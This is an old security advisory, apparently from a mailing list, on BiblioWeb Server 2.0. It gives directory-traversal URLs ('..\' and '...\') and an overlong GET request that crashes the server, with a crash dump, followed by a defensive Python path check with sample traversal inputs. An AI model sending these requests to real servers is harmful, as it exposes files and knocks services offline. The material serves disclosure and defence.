To Ben Greenbaum:

    Please post this advisory instead of the last.  I needed to
make a minor change to the 'Vendor Status' section.  Thanks.
----------

Vulnerabilities in BiblioWeb Server



    Overview

BiblioWeb Server 2.0 is a web server available from
http://www.biblioscape.com.  A vulnerability exists which allows a remote
user to break out of the web root using relative paths (i.e., '..', '...').
A second vulnerability allows a remote attacker to crash the server.



    Details

To break out of the web root, use the following URLs:

        http://localhost/..\[file outside web root]
        http://localhost/...\[file outside web root]

To crash the server, telnet to port 80, and send:

        GET /[a lot of 'A's]

    The server crashes with the following dump:


BIBLIOWEB caused an invalid page fault in
module BIBLIOWEB.EXE at 017f:004069fd.
Registers:
EAX=00408b70 CS=017f EIP=004069fd EFLGS=00010283
EBX=00408b70 SS=0187 ESP=0415fe88 EBP=04160418
ECX=00000001 DS=0187 ESI=04160414 FS=58df
EDX=04160414 ES=0187 EDI=04160518 GS=0000
Bytes at CS:EIP:
68 00 04 00 00 8d 44 24 04 50 8b 43 04 50 8b 03
Stack dump:




    Solution

No quick fix is possible.



    Vendor Status

CG Information was contacted via <[EMAIL PROTECTED]> on Monday,
January 29, 2001.  No reply was received.



        - Joe Testa  ( e-mail: [EMAIL PROTECTED] / AIM: LordSpankatron )
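
A server-side check that refuses the '..' and '...' requests shown under Details, as an added example (not part of the original advisory and not BiblioWeb's code). The web root, the function name and the sample requests are assumptions constructed for illustration.

```python
import ntpath
from urllib.parse import unquote

WEB_ROOT = r"C:\biblioweb\htdocs"  # assumed web root, not from the advisory


def resolve_request(url_path, web_root=WEB_ROOT):
    """Map a request target to a file under web_root, or return None to refuse."""
    # Drop the query string and decode %xx escapes once, so encoded
    # separators and dots (%5c, %2e) are checked in their decoded form.
    path = unquote(url_path.split("?", 1)[0])
    if "\x00" in path or ":" in path:
        return None  # NUL bytes, drive letters, alternate data streams
    # Windows accepts both '/' and '\' as separators, so split on both.
    segments = [s for s in path.replace("\\", "/").split("/") if s]
    for seg in segments:
        # Refuse every all-dot segment ('.', '..', '...' and longer runs),
        # and names ending in dots or spaces, which Windows strips on open.
        if seg.strip(".") == "" or seg != seg.rstrip(". "):
            return None
    root = ntpath.normpath(web_root)
    candidate = ntpath.normpath(ntpath.join(root, *segments))
    # Defence in depth: the normalised result must still sit under the root.
    if ntpath.commonpath([root, candidate]).lower() != root.lower():
        return None
    return candidate


if __name__ == "__main__":
    # Constructed sample requests; the last four must be refused.
    for target in ["/index.html", "/docs/a.html?x=1", "/..\\secret.txt",
                   "/...\\secret.txt", "/%2e%2e%5csecret.txt", "/docs/../x"]:
        print(f"{target!r:28} -> {resolve_request(target)}")
```

The check is deliberately strict: it refuses dot segments outright instead of trying to normalise them, so a request such as /docs/../x is rejected even though it would stay inside the root.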
